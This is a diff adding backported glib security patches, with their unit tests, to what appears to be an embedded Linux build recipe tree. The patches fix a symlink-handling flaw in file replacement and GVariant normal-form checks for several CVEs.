diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch
new file mode 100644
index 0000000000..a82febd26e
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch
@@ -0,0 +1,57 @@
1Backport of:
2
3From ce0eb088a68171eed3ac217cb92a72e36eb57d1b Mon Sep 17 00:00:00 2001
4From: Philip Withnall <pwithnall@endlessos.org>
5Date: Wed, 10 Mar 2021 16:05:55 +0000
6Subject: [PATCH 3/5] glocalfileoutputstream: Factor out a flag check
7
8This clarifies the code a little. It introduces no functional changes.
9
10Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
11
12Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
13CVE: CVE-2021-28153
14Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
15Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
16
17---
18 gio/glocalfileoutputstream.c | 7 ++++---
19 1 file changed, 4 insertions(+), 3 deletions(-)
20
21--- a/gio/glocalfileoutputstream.c
22+++ b/gio/glocalfileoutputstream.c
23@@ -847,6 +847,7 @@ handle_overwrite_open (const char *fi
24 int res;
25 int mode;
26 int errsv;
27+ gboolean replace_destination_set = (flags & G_FILE_CREATE_REPLACE_DESTINATION);
28
29 mode = mode_from_flags_or_info (flags, reference_info);
30
31@@ -954,7 +955,7 @@ handle_overwrite_open (const char *fi
32 * to a backup file and rewrite the contents of the file.
33 */
34
35- if ((flags & G_FILE_CREATE_REPLACE_DESTINATION) ||
36+ if (replace_destination_set ||
37 (!(original_stat.st_nlink > 1) && !is_symlink))
38 {
39 char *dirname, *tmp_filename;
40@@ -973,7 +974,7 @@ handle_overwrite_open (const char *fi
41
42 /* try to keep permissions (unless replacing) */
43
44- if ( ! (flags & G_FILE_CREATE_REPLACE_DESTINATION) &&
45+ if (!replace_destination_set &&
46 (
47 #ifdef HAVE_FCHOWN
48 fchown (tmpfd, original_stat.st_uid, original_stat.st_gid) == -1 ||
49@@ -1112,7 +1113,7 @@ handle_overwrite_open (const char *fi
50 }
51 }
52
53- if (flags & G_FILE_CREATE_REPLACE_DESTINATION)
54+ if (replace_destination_set)
55 {
56 g_close (fd, NULL);
57
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch
new file mode 100644
index 0000000000..5b106e8474
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch
@@ -0,0 +1,265 @@
1Backport of:
2
3From 317b3b587058a05dca95d56dac26568c5b098d33 Mon Sep 17 00:00:00 2001
4From: Philip Withnall <pwithnall@endlessos.org>
5Date: Wed, 24 Feb 2021 17:36:07 +0000
6Subject: [PATCH 4/5] glocalfileoutputstream: Fix CREATE_REPLACE_DESTINATION
7 with symlinks
8MIME-Version: 1.0
9Content-Type: text/plain; charset=UTF-8
10Content-Transfer-Encoding: 8bit
11
12The `G_FILE_CREATE_REPLACE_DESTINATION` flag is equivalent to unlinking
13the destination file and re-creating it from scratch. That did
14previously work, but in the process the code would call `open(O_CREAT)`
15on the file. If the file was a dangling symlink, this would create the
16destination file (empty). That’s not an intended side-effect, and has
17security implications if the symlink is controlled by a lower-privileged
18process.
19
20Fix that by not opening the destination file if it’s a symlink, and
21adjusting the rest of the code to cope with
22 - the fact that `fd == -1` is not an error iff `is_symlink` is true,
23 - and that `original_stat` will contain the `lstat()` results for the
24 symlink now, rather than the `stat()` results for its target (again,
25 iff `is_symlink` is true).
26
27This means that the target of the dangling symlink is no longer created,
28which was the bug. The symlink itself continues to be replaced (as
29before) with the new file — this is the intended behaviour of
30`g_file_replace()`.
31
32The behaviour for non-symlink cases, or cases where the symlink was not
33dangling, should be unchanged.
34
35Includes a unit test.
36
37Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
38
39Fixes: #2325
40
41Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
42CVE: CVE-2021-28153
43Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
44Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
45
46---
47 gio/glocalfileoutputstream.c | 77 ++++++++++++++++++-------
48 gio/tests/file.c | 108 +++++++++++++++++++++++++++++++++++
49 2 files changed, 163 insertions(+), 22 deletions(-)
50
51--- a/gio/glocalfileoutputstream.c
52+++ b/gio/glocalfileoutputstream.c
53@@ -875,16 +875,22 @@ handle_overwrite_open (const char *fi
54 /* Could be a symlink, or it could be a regular ELOOP error,
55 * but then the next open will fail too. */
56 is_symlink = TRUE;
57- fd = g_open (filename, open_flags, mode);
58+ if (!replace_destination_set)
59+ fd = g_open (filename, open_flags, mode);
60 }
61-#else
62- fd = g_open (filename, open_flags, mode);
63- errsv = errno;
64+#else /* if !O_NOFOLLOW */
65 /* This is racy, but we do it as soon as possible to minimize the race */
66 is_symlink = g_file_test (filename, G_FILE_TEST_IS_SYMLINK);
67+
68+ if (!is_symlink || !replace_destination_set)
69+ {
70+ fd = g_open (filename, open_flags, mode);
71+ errsv = errno;
72+ }
73 #endif
74
75- if (fd == -1)
76+ if (fd == -1 &&
77+ (!is_symlink || !replace_destination_set))
78 {
79 char *display_name = g_filename_display_name (filename);
80 g_set_error (error, G_IO_ERROR,
81@@ -898,7 +904,14 @@ handle_overwrite_open (const char *fi
82 #ifdef G_OS_WIN32
83 res = GLIB_PRIVATE_CALL (g_win32_fstat) (fd, &original_stat);
84 #else
85- res = fstat (fd, &original_stat);
86+ if (!is_symlink)
87+ {
88+ res = fstat (fd, &original_stat);
89+ }
90+ else
91+ {
92+ res = lstat (filename, &original_stat);
93+ }
94 #endif
95 errsv = errno;
96
97@@ -917,16 +930,27 @@ handle_overwrite_open (const char *fi
98 if (!S_ISREG (original_stat.st_mode))
99 {
100 if (S_ISDIR (original_stat.st_mode))
101- g_set_error_literal (error,
102- G_IO_ERROR,
103- G_IO_ERROR_IS_DIRECTORY,
104- _("Target file is a directory"));
105- else
106- g_set_error_literal (error,
107+ {
108+ g_set_error_literal (error,
109+ G_IO_ERROR,
110+ G_IO_ERROR_IS_DIRECTORY,
111+ _("Target file is a directory"));
112+ goto err_out;
113+ }
114+ else if (!is_symlink ||
115+#ifdef S_ISLNK
116+ !S_ISLNK (original_stat.st_mode)
117+#else
118+ FALSE
119+#endif
120+ )
121+ {
122+ g_set_error_literal (error,
123 G_IO_ERROR,
124 G_IO_ERROR_NOT_REGULAR_FILE,
125 _("Target file is not a regular file"));
126- goto err_out;
127+ goto err_out;
128+ }
129 }
130
131 if (etag != NULL)
132@@ -1007,7 +1031,8 @@ handle_overwrite_open (const char *fi
133 }
134 }
135
136- g_close (fd, NULL);
137+ if (fd >= 0)
138+ g_close (fd, NULL);
139 *temp_filename = tmp_filename;
140 return tmpfd;
141 }
142--- a/gio/tests/file.c
143+++ b/gio/tests/file.c
144@@ -804,6 +804,113 @@ test_replace_cancel (void)
145 g_object_unref (tmpdir);
146 }
147
148+static void
149+test_replace_symlink (void)
150+{
151+#ifdef G_OS_UNIX
152+ gchar *tmpdir_path = NULL;
153+ GFile *tmpdir = NULL, *source_file = NULL, *target_file = NULL;
154+ GFileOutputStream *stream = NULL;
155+ const gchar *new_contents = "this is a test message which should be written to source and not target";
156+ gsize n_written;
157+ GFileEnumerator *enumerator = NULL;
158+ GFileInfo *info = NULL;
159+ gchar *contents = NULL;
160+ gsize length = 0;
161+ GError *local_error = NULL;
162+
163+ g_test_bug ("https://gitlab.gnome.org/GNOME/glib/-/issues/2325");
164+ g_test_summary ("Test that G_FILE_CREATE_REPLACE_DESTINATION doesn’t follow symlinks");
165+
166+ /* Create a fresh, empty working directory. */
167+ tmpdir_path = g_dir_make_tmp ("g_file_replace_symlink_XXXXXX", &local_error);
168+ g_assert_no_error (local_error);
169+ tmpdir = g_file_new_for_path (tmpdir_path);
170+
171+ g_test_message ("Using temporary directory %s", tmpdir_path);
172+ g_free (tmpdir_path);
173+
174+ /* Create symlink `source` which points to `target`. */
175+ source_file = g_file_get_child (tmpdir, "source");
176+ target_file = g_file_get_child (tmpdir, "target");
177+ g_file_make_symbolic_link (source_file, "target", NULL, &local_error);
178+ g_assert_no_error (local_error);
179+
180+ /* Ensure that `target` doesn’t exist */
181+ g_assert_false (g_file_query_exists (target_file, NULL));
182+
183+ /* Replace the `source` symlink with a regular file using
184+ * %G_FILE_CREATE_REPLACE_DESTINATION, which should replace it *without*
185+ * following the symlink */
186+ stream = g_file_replace (source_file, NULL, FALSE /* no backup */,
187+ G_FILE_CREATE_REPLACE_DESTINATION, NULL, &local_error);
188+ g_assert_no_error (local_error);
189+
190+ g_output_stream_write_all (G_OUTPUT_STREAM (stream), new_contents, strlen (new_contents),
191+ &n_written, NULL, &local_error);
192+ g_assert_no_error (local_error);
193+ g_assert_cmpint (n_written, ==, strlen (new_contents));
194+
195+ g_output_stream_close (G_OUTPUT_STREAM (stream), NULL, &local_error);
196+ g_assert_no_error (local_error);
197+
198+ g_clear_object (&stream);
199+
200+ /* At this point, there should still only be one file: `source`. It should
201+ * now be a regular file. `target` should not exist. */
202+ enumerator = g_file_enumerate_children (tmpdir,
203+ G_FILE_ATTRIBUTE_STANDARD_NAME ","
204+ G_FILE_ATTRIBUTE_STANDARD_TYPE,
205+ G_FILE_QUERY_INFO_NOFOLLOW_SYMLINKS, NULL, &local_error);
206+ g_assert_no_error (local_error);
207+
208+ info = g_file_enumerator_next_file (enumerator, NULL, &local_error);
209+ g_assert_no_error (local_error);
210+ g_assert_nonnull (info);
211+
212+ g_assert_cmpstr (g_file_info_get_name (info), ==, "source");
213+ g_assert_cmpint (g_file_info_get_file_type (info), ==, G_FILE_TYPE_REGULAR);
214+
215+ g_clear_object (&info);
216+
217+ info = g_file_enumerator_next_file (enumerator, NULL, &local_error);
218+ g_assert_no_error (local_error);
219+ g_assert_null (info);
220+
221+ g_file_enumerator_close (enumerator, NULL, &local_error);
222+ g_assert_no_error (local_error);
223+ g_clear_object (&enumerator);
224+
225+ /* Double-check that `target` doesn’t exist */
226+ g_assert_false (g_file_query_exists (target_file, NULL));
227+
228+ /* Check the content of `source`. */
229+ g_file_load_contents (source_file,
230+ NULL,
231+ &contents,
232+ &length,
233+ NULL,
234+ &local_error);
235+ g_assert_no_error (local_error);
236+ g_assert_cmpstr (contents, ==, new_contents);
237+ g_assert_cmpuint (length, ==, strlen (new_contents));
238+ g_free (contents);
239+
240+ /* Tidy up. */
241+ g_file_delete (source_file, NULL, &local_error);
242+ g_assert_no_error (local_error);
243+
244+ g_file_delete (tmpdir, NULL, &local_error);
245+ g_assert_no_error (local_error);
246+
247+ g_clear_object (&target_file);
248+ g_clear_object (&source_file);
249+ g_clear_object (&tmpdir);
250+#else /* if !G_OS_UNIX */
251+ g_test_skip ("Symlink replacement tests can only be run on Unix")
252+#endif
253+}
254+
255 static void
256 on_file_deleted (GObject *object,
257 GAsyncResult *result,
258@@ -1752,6 +1859,7 @@ main (int argc, char *argv[])
259 g_test_add_data_func ("/file/async-create-delete/4096", GINT_TO_POINTER (4096), test_create_delete);
260 g_test_add_func ("/file/replace-load", test_replace_load);
261 g_test_add_func ("/file/replace-cancel", test_replace_cancel);
262+ g_test_add_func ("/file/replace-symlink", test_replace_symlink);
263 g_test_add_func ("/file/async-delete", test_async_delete);
264 #ifdef G_OS_UNIX
265 g_test_add_func ("/file/copy-preserve-mode", test_copy_preserve_mode);
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch
new file mode 100644
index 0000000000..2334147f7d
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch
@@ -0,0 +1,55 @@
1From 6c6439261bc7a8a0627519848a7222b3e1bd4ffe Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Wed, 24 Feb 2021 17:42:24 +0000
4Subject: [PATCH 5/5] glocalfileoutputstream: Add a missing O_CLOEXEC flag to
5 replace()
6
7Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
8
9Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
10CVE: CVE-2021-28153
11Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
12Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
13
14---
15 gio/glocalfileoutputstream.c | 15 ++++++++++++---
16 1 file changed, 12 insertions(+), 3 deletions(-)
17
18--- a/gio/glocalfileoutputstream.c
19+++ b/gio/glocalfileoutputstream.c
20@@ -58,6 +58,12 @@
21 #define O_BINARY 0
22 #endif
23
24+#ifndef O_CLOEXEC
25+#define O_CLOEXEC 0
26+#else
27+#define HAVE_O_CLOEXEC 1
28+#endif
29+
30 struct _GLocalFileOutputStreamPrivate {
31 char *tmp_filename;
32 char *original_filename;
33@@ -1223,7 +1229,7 @@ _g_local_file_output_stream_replace (con
34 sync_on_close = FALSE;
35
36 /* If the file doesn't exist, create it */
37- open_flags = O_CREAT | O_EXCL | O_BINARY;
38+ open_flags = O_CREAT | O_EXCL | O_BINARY | O_CLOEXEC;
39 if (readable)
40 open_flags |= O_RDWR;
41 else
42@@ -1253,8 +1259,11 @@ _g_local_file_output_stream_replace (con
43 set_error_from_open_errno (filename, error);
44 return NULL;
45 }
46-
47-
48+#if !defined(HAVE_O_CLOEXEC) && defined(F_SETFD)
49+ else
50+ fcntl (fd, F_SETFD, FD_CLOEXEC);
51+#endif
52+
53 stream = g_object_new (G_TYPE_LOCAL_FILE_OUTPUT_STREAM, NULL);
54 stream->priv->fd = fd;
55 stream->priv->sync_on_close = sync_on_close;
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch
new file mode 100644
index 0000000000..ce90586290
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch
@@ -0,0 +1,290 @@
1From 5f4485c4ff57fdefb1661531788def7ca5a47328 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 17 Aug 2023 04:19:44 +0000
4Subject: [PATCH] gvariant-serialiser: Check offset table entry size is minimal
5
6The entries in an offset table (which is used for variable sized arrays
7and tuples containing variable sized members) are sized so that they can
8address every byte in the overall variant.
9
10The specification requires that for a variant to be in normal form, its
11offset table entries must be the minimum width such that they can
12address every byte in the variant.
13
14That minimality requirement was not checked in
15`g_variant_is_normal_form()`, leading to two different byte arrays being
16interpreted as the normal form of a given variant tree. That kind of
17confusion could potentially be exploited, and is certainly a bug.
18
19Fix it by adding the necessary checks on offset table entry width, and
20unit tests.
21
22Spotted by William Manley.
23
24Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
25
26Fixes: #2794
27
28CVE: CVE-2023-29499
29Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/5f4485c4ff57fdefb1661531788def7ca5a47328]
30Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
31---
32 glib/gvariant-serialiser.c | 19 +++-
33 glib/tests/gvariant.c | 176 +++++++++++++++++++++++++++++++++++++
34 2 files changed, 194 insertions(+), 1 deletion(-)
35
36diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
37index 0bf7243..5aa2cbc 100644
38--- a/glib/gvariant-serialiser.c
39+++ b/glib/gvariant-serialiser.c
40@@ -694,6 +694,10 @@ gvs_variable_sized_array_get_frame_offsets (GVariantSerialised value)
41 out.data_size = last_end;
42 out.array = value.data + last_end;
43 out.length = offsets_array_size / out.offset_size;
44+
45+ if (out.length > 0 && gvs_calculate_total_size (last_end, out.length) != value.size)
46+ return out; /* offset size not minimal */
47+
48 out.is_normal = TRUE;
49
50 return out;
51@@ -1201,6 +1205,7 @@ gvs_tuple_is_normal (GVariantSerialised value)
52 gsize length;
53 gsize offset;
54 gsize i;
55+ gsize offset_table_size;
56
57 /* as per the comment in gvs_tuple_get_child() */
58 if G_UNLIKELY (value.data == NULL && value.size != 0)
59@@ -1305,7 +1310,19 @@ gvs_tuple_is_normal (GVariantSerialised value)
60 }
61 }
62
63- return offset_ptr == offset;
64+ /* @offset_ptr has been counting backwards from the end of the variant, to
65+ * find the beginning of the offset table. @offset has been counting forwards
66+ * from the beginning of the variant to find the end of the data. They should
67+ * have met in the middle. */
68+ if (offset_ptr != offset)
69+ return FALSE;
70+
71+ offset_table_size = value.size - offset_ptr;
72+ if (value.size > 0 &&
73+ gvs_calculate_total_size (offset, offset_table_size / offset_size) != value.size)
74+ return FALSE; /* offset size not minimal */
75+
76+ return TRUE;
77 }
78
79 /* Variants {{{2
80diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
81index d640c81..4ce0e4f 100644
82--- a/glib/tests/gvariant.c
83+++ b/glib/tests/gvariant.c
84@@ -5092,6 +5092,86 @@ test_normal_checking_array_offsets2 (void)
85 g_variant_unref (variant);
86 }
87
88+/* Test that an otherwise-valid serialised GVariant is considered non-normal if
89+ * its offset table entries are too wide.
90+ *
91+ * See §2.3.6 (Framing Offsets) of the GVariant specification. */
92+static void
93+test_normal_checking_array_offsets_minimal_sized (void)
94+{
95+ GVariantBuilder builder;
96+ gsize i;
97+ GVariant *aay_constructed = NULL;
98+ const guint8 *data = NULL;
99+ guint8 *data_owned = NULL;
100+ GVariant *aay_deserialised = NULL;
101+ GVariant *aay_normalised = NULL;
102+
103+ /* Construct an array of type aay, consisting of 128 elements which are each
104+ * an empty array, i.e. `[[] * 128]`. This is chosen because the inner
105+ * elements are variable sized (making the outer array variable sized, so it
106+ * must have an offset table), but they are also zero-sized when serialised.
107+ * So the serialised representation of @aay_constructed consists entirely of
108+ * its offset table, which is entirely zeroes.
109+ *
110+ * The array is chosen to be 128 elements long because that means offset
111+ * table entries which are 1 byte long. If the elements in the array were
112+ * non-zero-sized (to the extent that the overall array is ≥256 bytes long),
113+ * the offset table entries would end up being 2 bytes long. */
114+ g_variant_builder_init (&builder, G_VARIANT_TYPE ("aay"));
115+
116+ for (i = 0; i < 128; i++)
117+ g_variant_builder_add_value (&builder, g_variant_new_array (G_VARIANT_TYPE_BYTE, NULL, 0));
118+
119+ aay_constructed = g_variant_builder_end (&builder);
120+
121+ /* Verify that the constructed array is in normal form, and its serialised
122+ * form is `b'\0' * 128`. */
123+ g_assert_true (g_variant_is_normal_form (aay_constructed));
124+ g_assert_cmpuint (g_variant_n_children (aay_constructed), ==, 128);
125+ g_assert_cmpuint (g_variant_get_size (aay_constructed), ==, 128);
126+
127+ data = g_variant_get_data (aay_constructed);
128+ for (i = 0; i < g_variant_get_size (aay_constructed); i++)
129+ g_assert_cmpuint (data[i], ==, 0);
130+
131+ /* Construct a serialised `aay` GVariant which is `b'\0' * 256`. This has to
132+ * be a non-normal form of `[[] * 128]`, with 2-byte-long offset table
133+ * entries, because each offset table entry has to be able to reference all of
134+ * the byte boundaries in the container. All the entries in the offset table
135+ * are zero, so all the elements of the array are zero-sized. */
136+ data = data_owned = g_malloc0 (256);
137+ aay_deserialised = g_variant_new_from_data (G_VARIANT_TYPE ("aay"),
138+ data,
139+ 256,
140+ FALSE,
141+ g_free,
142+ g_steal_pointer (&data_owned));
143+
144+ g_assert_false (g_variant_is_normal_form (aay_deserialised));
145+ g_assert_cmpuint (g_variant_n_children (aay_deserialised), ==, 128);
146+ g_assert_cmpuint (g_variant_get_size (aay_deserialised), ==, 256);
147+
148+ data = g_variant_get_data (aay_deserialised);
149+ for (i = 0; i < g_variant_get_size (aay_deserialised); i++)
150+ g_assert_cmpuint (data[i], ==, 0);
151+
152+ /* Get its normal form. That should change the serialised size. */
153+ aay_normalised = g_variant_get_normal_form (aay_deserialised);
154+
155+ g_assert_true (g_variant_is_normal_form (aay_normalised));
156+ g_assert_cmpuint (g_variant_n_children (aay_normalised), ==, 128);
157+ g_assert_cmpuint (g_variant_get_size (aay_normalised), ==, 128);
158+
159+ data = g_variant_get_data (aay_normalised);
160+ for (i = 0; i < g_variant_get_size (aay_normalised); i++)
161+ g_assert_cmpuint (data[i], ==, 0);
162+
163+ g_variant_unref (aay_normalised);
164+ g_variant_unref (aay_deserialised);
165+ g_variant_unref (aay_constructed);
166+}
167+
168 /* Test that a tuple with invalidly large values in its offset table is
169 * normalised successfully without looping infinitely. */
170 static void
171@@ -5286,6 +5366,98 @@ test_normal_checking_tuple_offsets4 (void)
172 g_variant_unref (variant);
173 }
174
175+/* Test that an otherwise-valid serialised GVariant is considered non-normal if
176+ * its offset table entries are too wide.
177+ *
178+ * See §2.3.6 (Framing Offsets) of the GVariant specification. */
179+static void
180+test_normal_checking_tuple_offsets_minimal_sized (void)
181+{
182+ GString *type_string = NULL;
183+ GVariantBuilder builder;
184+ gsize i;
185+ GVariant *ray_constructed = NULL;
186+ const guint8 *data = NULL;
187+ guint8 *data_owned = NULL;
188+ GVariant *ray_deserialised = NULL;
189+ GVariant *ray_normalised = NULL;
190+
191+ /* Construct a tuple of type (ay…ay), consisting of 129 members which are each
192+ * an empty array, i.e. `([] * 129)`. This is chosen because the inner
193+ * members are variable sized, so the outer tuple must have an offset table,
194+ * but they are also zero-sized when serialised. So the serialised
195+ * representation of @ray_constructed consists entirely of its offset table,
196+ * which is entirely zeroes.
197+ *
198+ * The tuple is chosen to be 129 members long because that means it has 128
199+ * offset table entries which are 1 byte long each. If the members in the
200+ * tuple were non-zero-sized (to the extent that the overall tuple is ≥256
201+ * bytes long), the offset table entries would end up being 2 bytes long.
202+ *
203+ * 129 members are used unlike 128 array elements in
204+ * test_normal_checking_array_offsets_minimal_sized(), because the last member
205+ * in a tuple never needs an offset table entry. */
206+ type_string = g_string_new ("");
207+ g_string_append_c (type_string, '(');
208+ for (i = 0; i < 129; i++)
209+ g_string_append (type_string, "ay");
210+ g_string_append_c (type_string, ')');
211+
212+ g_variant_builder_init (&builder, G_VARIANT_TYPE (type_string->str));
213+
214+ for (i = 0; i < 129; i++)
215+ g_variant_builder_add_value (&builder, g_variant_new_array (G_VARIANT_TYPE_BYTE, NULL, 0));
216+
217+ ray_constructed = g_variant_builder_end (&builder);
218+
219+ /* Verify that the constructed tuple is in normal form, and its serialised
220+ * form is `b'\0' * 128`. */
221+ g_assert_true (g_variant_is_normal_form (ray_constructed));
222+ g_assert_cmpuint (g_variant_n_children (ray_constructed), ==, 129);
223+ g_assert_cmpuint (g_variant_get_size (ray_constructed), ==, 128);
224+
225+ data = g_variant_get_data (ray_constructed);
226+ for (i = 0; i < g_variant_get_size (ray_constructed); i++)
227+ g_assert_cmpuint (data[i], ==, 0);
228+
229+ /* Construct a serialised `(ay…ay)` GVariant which is `b'\0' * 256`. This has
230+ * to be a non-normal form of `([] * 129)`, with 2-byte-long offset table
231+ * entries, because each offset table entry has to be able to reference all of
232+ * the byte boundaries in the container. All the entries in the offset table
233+ * are zero, so all the members of the tuple are zero-sized. */
234+ data = data_owned = g_malloc0 (256);
235+ ray_deserialised = g_variant_new_from_data (G_VARIANT_TYPE (type_string->str),
236+ data,
237+ 256,
238+ FALSE,
239+ g_free,
240+ g_steal_pointer (&data_owned));
241+
242+ g_assert_false (g_variant_is_normal_form (ray_deserialised));
243+ g_assert_cmpuint (g_variant_n_children (ray_deserialised), ==, 129);
244+ g_assert_cmpuint (g_variant_get_size (ray_deserialised), ==, 256);
245+
246+ data = g_variant_get_data (ray_deserialised);
247+ for (i = 0; i < g_variant_get_size (ray_deserialised); i++)
248+ g_assert_cmpuint (data[i], ==, 0);
249+
250+ /* Get its normal form. That should change the serialised size. */
251+ ray_normalised = g_variant_get_normal_form (ray_deserialised);
252+
253+ g_assert_true (g_variant_is_normal_form (ray_normalised));
254+ g_assert_cmpuint (g_variant_n_children (ray_normalised), ==, 129);
255+ g_assert_cmpuint (g_variant_get_size (ray_normalised), ==, 128);
256+
257+ data = g_variant_get_data (ray_normalised);
258+ for (i = 0; i < g_variant_get_size (ray_normalised); i++)
259+ g_assert_cmpuint (data[i], ==, 0);
260+
261+ g_variant_unref (ray_normalised);
262+ g_variant_unref (ray_deserialised);
263+ g_variant_unref (ray_constructed);
264+ g_string_free (type_string, TRUE);
265+}
266+
267 /* Test that an empty object path is normalised successfully to the base object
268 * path, ‘/’. */
269 static void
270@@ -5431,6 +5603,8 @@ main (int argc, char **argv)
271 test_normal_checking_array_offsets);
272 g_test_add_func ("/gvariant/normal-checking/array-offsets2",
273 test_normal_checking_array_offsets2);
274+ g_test_add_func ("/gvariant/normal-checking/array-offsets/minimal-sized",
275+ test_normal_checking_array_offsets_minimal_sized);
276 g_test_add_func ("/gvariant/normal-checking/tuple-offsets",
277 test_normal_checking_tuple_offsets);
278 g_test_add_func ("/gvariant/normal-checking/tuple-offsets2",
279@@ -5439,6 +5613,8 @@ main (int argc, char **argv)
280 test_normal_checking_tuple_offsets3);
281 g_test_add_func ("/gvariant/normal-checking/tuple-offsets4",
282 test_normal_checking_tuple_offsets4);
283+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets/minimal-sized",
284+ test_normal_checking_tuple_offsets_minimal_sized);
285 g_test_add_func ("/gvariant/normal-checking/empty-object-path",
286 test_normal_checking_empty_object_path);
287
288--
2892.24.4
290
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch
new file mode 100644
index 0000000000..b2187f2af9
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch
@@ -0,0 +1,89 @@
1From 1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1 Mon Sep 17 00:00:00 2001
2From: William Manley <will@stb-tester.com>
3Date: Wed, 9 Aug 2023 10:04:49 +0000
4Subject: [PATCH] gvariant-core: Consolidate construction of
5 `GVariantSerialised`
6
7So I only need to change it in one place.
8
9This introduces no functional changes.
10
11Helps: #2121
12
13CVE: CVE-2023-32665
14Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1]
15Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
16---
17 glib/gvariant.c | 8 +++++---
18 glib/tests/gvariant.c | 24 ++++++++++++++++++++++++
19 2 files changed, 29 insertions(+), 3 deletions(-)
20
21diff --git a/glib/gvariant.c b/glib/gvariant.c
22index 8ba701e..4dbd9e8 100644
23--- a/glib/gvariant.c
24+++ b/glib/gvariant.c
25@@ -5952,14 +5952,16 @@ g_variant_byteswap (GVariant *value)
26 g_variant_serialised_byteswap (serialised);
27
28 bytes = g_bytes_new_take (serialised.data, serialised.size);
29- new = g_variant_new_from_bytes (g_variant_get_type (value), bytes, TRUE);
30+ new = g_variant_ref_sink (g_variant_new_from_bytes (g_variant_get_type (value), bytes, TRUE));
31 g_bytes_unref (bytes);
32 }
33 else
34 /* contains no multi-byte data */
35- new = value;
36+ new = g_variant_get_normal_form (value);
37
38- return g_variant_ref_sink (new);
39+ g_assert (g_variant_is_trusted (new));
40+
41+ return g_steal_pointer (&new);
42 }
43
44 /**
45diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
46index 4ce0e4f..3dda08e 100644
47--- a/glib/tests/gvariant.c
48+++ b/glib/tests/gvariant.c
49@@ -3834,6 +3834,29 @@ test_gv_byteswap (void)
50 g_free (string);
51 }
52
53+static void
54+test_gv_byteswap_non_normal_non_aligned (void)
55+{
56+ const guint8 data[] = { 0x02 };
57+ GVariant *v = NULL;
58+ GVariant *v_byteswapped = NULL;
59+
60+ g_test_summary ("Test that calling g_variant_byteswap() on a variant which "
61+ "is in non-normal form and doesn’t need byteswapping returns "
62+ "the same variant in normal form.");
63+
64+ v = g_variant_new_from_data (G_VARIANT_TYPE_BOOLEAN, data, sizeof (data), FALSE, NULL, NULL);
65+ g_assert_false (g_variant_is_normal_form (v));
66+
67+ v_byteswapped = g_variant_byteswap (v);
68+ g_assert_true (g_variant_is_normal_form (v_byteswapped));
69+
70+ g_assert_cmpvariant (v, v_byteswapped);
71+
72+ g_variant_unref (v);
73+ g_variant_unref (v_byteswapped);
74+}
75+
76 static void
77 test_parser (void)
78 {
79@@ -5570,6 +5593,7 @@ main (int argc, char **argv)
80 g_test_add_func ("/gvariant/builder-memory", test_builder_memory);
81 g_test_add_func ("/gvariant/hashing", test_hashing);
82 g_test_add_func ("/gvariant/byteswap", test_gv_byteswap);
83+ g_test_add_func ("/gvariant/byteswap/non-normal-non-aligned", test_gv_byteswap_non_normal_non_aligned);
84 g_test_add_func ("/gvariant/parser", test_parses);
85 g_test_add_func ("/gvariant/parser/integer-bounds", test_parser_integer_bounds);
86 g_test_add_func ("/gvariant/parser/recursion", test_parser_recursion);
87--
882.24.4
89
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch
new file mode 100644
index 0000000000..9167ea624f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch
@@ -0,0 +1,255 @@
1From 446e69f5edd72deb2196dee36bbaf8056caf6948 Mon Sep 17 00:00:00 2001
2From: William Manley <will@stb-tester.com>
